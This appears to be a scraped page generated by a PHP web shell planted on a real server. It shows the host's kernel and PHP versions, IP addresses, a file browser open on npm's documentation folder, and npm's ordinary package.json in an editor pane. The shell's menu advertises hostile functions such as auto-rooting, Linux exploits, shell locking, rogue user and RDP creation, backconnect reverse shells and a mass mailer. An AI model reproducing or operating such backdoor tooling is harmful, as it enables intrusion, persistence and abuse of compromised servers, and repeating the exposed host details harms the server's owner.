Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
node_modules /
npm /
docs /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
content
[ DIR ]
drwxr-xr-x
?;
public
[ DIR ]
drwxr-xr-x
?;
src
[ DIR ]
drwxr-xr-x
LICENSE
1.05
KB
-rw-r--r--
gatsby-browser.js
250
B
-rw-r--r--
gatsby-config.js
2.84
KB
-rw-r--r--
gatsby-node.js
974
B
-rw-r--r--
gatsby-ssr.js
179
B
-rw-r--r--
package-lock.json
683.83
KB
-rw-r--r--
package.json
1.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "npm-cli-docs", "description": "npm cli docs", "version": "0.1.0", "author": "Tanya Brassie <tanyabrassie@tanyascmachine2.home>", "license": "Artistic-2.0", "repository": { "type": "git", "url": "https://github.com/npm/cli" }, "dependencies": { "babel-plugin-styled-components": "^1.10.6", "eslint": "^6.3.0", "gatsby": "^2.13.73", "gatsby-image": "^2.2.10", "gatsby-plugin-catch-links": "^2.1.9", "gatsby-plugin-ipfs": "^2.0.2", "gatsby-plugin-manifest": "^2.2.6", "gatsby-plugin-no-sourcemaps": "^2.1.1", "gatsby-plugin-offline": "^2.2.7", "gatsby-plugin-prefetch-google-fonts": "^1.4.3", "gatsby-plugin-react-helmet": "^3.1.4", "gatsby-plugin-root-import": "^2.0.5", "gatsby-plugin-sharp": "^2.2.13", "gatsby-plugin-styled-components": "^3.1.11", "gatsby-remark-autolink-headers": "^2.1.10", "gatsby-remark-prismjs": "^3.3.13", "gatsby-source-filesystem": "^2.1.21", "gatsby-transformer-remark": "^2.6.22", "prismjs": "^1.17.1", "prop-types": "^15.7.2", "react": "^16.9.0", "react-dom": "^16.9.0", "react-helmet": "^5.2.1", "rebass": "^4.0.5", "styled-components": "^4.4.0" }, "scripts": { "develop": "gatsby develop", "start": "npm run develop", "build": "gatsby build", "build:static": "GATSBY_IS_STATIC=true gatsby build --prefix-paths", "serve": "gatsby serve" } }
Close